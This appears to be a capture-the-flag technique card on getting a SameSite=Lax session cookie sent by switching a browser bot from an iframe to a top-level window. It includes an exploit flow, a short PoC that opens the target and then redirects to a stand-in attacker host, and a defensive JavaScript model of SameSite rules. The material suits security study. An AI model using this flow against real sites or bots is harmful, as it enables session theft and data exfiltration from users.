web javascript samesite cookies csrf browser-bot exfiltration

Switch from iframe-based exfiltration to a top-level window so a SameSite=Lax cookie is actually sent.

SameSite=Lax Means Top-Level Navigation Sends the Cookie

SameSite=Lax cookies are withheld on cross-site subresource requests, including iframe loads, but are sent on top-level cross-site navigations that use a safe method such as GET. An attacker who sees no cookie in an iframe test wrongly concludes that the cookie is unreachable.

Why It Works

  • A top-level window.open / navigation to the target origin carries the Lax cookie, unlike an iframe subrequest.
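To check which cross-site request kinds would still carry a given session cookie, here is an added model of the browser's SameSite attachment rule (example code written for this page, not the PoC or the bot from the source). The Set-Cookie lines, hostnames and the `exposure` helper are constructed for illustration, and site matching assumes a plain two-label registrable domain.

```javascript
// Added example (not the page's PoC): a model of the SameSite attachment rule so a
// defender can see which cross-site request kinds would still carry a cookie.

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS", "TRACE"]);

// Parse the attributes of one Set-Cookie header value.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const cookie = { name: pair.slice(0, pair.indexOf("=")), sameSite: null, secure: false, httpOnly: false };
  for (const attr of attrs) {
    const [key, value = ""] = attr.split("=");
    switch (key.toLowerCase()) {
      case "samesite": cookie.sameSite = value.toLowerCase(); break;
      case "secure":   cookie.secure = true; break;
      case "httponly": cookie.httpOnly = true; break;
    }
  }
  return cookie;
}

// Registrable site of an origin. Assumes a two-label eTLD+1 (no public-suffix list).
function site(origin) {
  return new URL(origin).hostname.split(".").slice(-2).join(".");
}

// Would the browser attach `cookie` to `request`? request = { method, url, initiator,
// topLevel }: initiator is the origin that caused the request, topLevel is true only
// for a navigation of the top frame (window.open, link click, form submit).
// Unspecified SameSite is treated as Lax and None without Secure is dropped (Chromium).
function cookieSent(cookie, request) {
  if (cookie.secure && !request.url.startsWith("https:")) return false;
  if (site(request.initiator) === site(request.url)) return true;
  switch (cookie.sameSite ?? "lax") {
    case "none":   return cookie.secure;
    case "strict": return false;
    default:       return request.topLevel && SAFE_METHODS.has(request.method);
  }
}

// The page's scenario: one cross-site origin, three request kinds against the target.
function exposure(setCookieHeader) {
  const cookie = parseSetCookie(setCookieHeader);
  const initiator = "https://attacker.example";
  const url = "https://target.example/profile";
  return {
    iframe:   cookieSent(cookie, { method: "GET",  url, initiator, topLevel: false }),
    topNav:   cookieSent(cookie, { method: "GET",  url, initiator, topLevel: true }),
    formPost: cookieSent(cookie, { method: "POST", url, initiator, topLevel: true }),
  };
}
```

HttpOnly is parsed but deliberately has no effect on the result: it only blocks script access to the cookie, not whether the browser attaches it. Chromium's two-minute Lax+POST allowance for cookies with no SameSite attribute is not modelled.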

Vulnerable Pattern

  • Bot-based exfiltration flows where the attacker sees no cookie in an iframe and gives up too early.

Exploit Flow

  1. Determine whether the target cookie is Lax, Strict, or unrestricted.
  2. If Lax, switch from iframe to a top-level window/tab that first visits the target origin.
  3. After the page loads with cookies, redirect or message back into your controlled origin.

Variations

  • window.open, navigation chains, opener-based channels, or same-window redirects inside the bot.

Common Blockers

  • Bot popup restrictions, cookie HttpOnly, or no usable exfil channel after the authenticated navigation.

PoC Sketch

// Open the target as a top-level navigation, so the Lax cookie is attached to the request.
const w = window.open("https://target/profile");
// After the authenticated page has had time to load, navigate the same window back to the controlled origin.
setTimeout(() => w.location = "https://attacker/callback", 1000);

Good Situations To Use It

  • The session cookie is SameSite=Lax.
  • A bot will follow a top-level navigation.
  • You only saw "no cookie" in an iframe test.

Sources

  • labossi_2026/web/trusted_support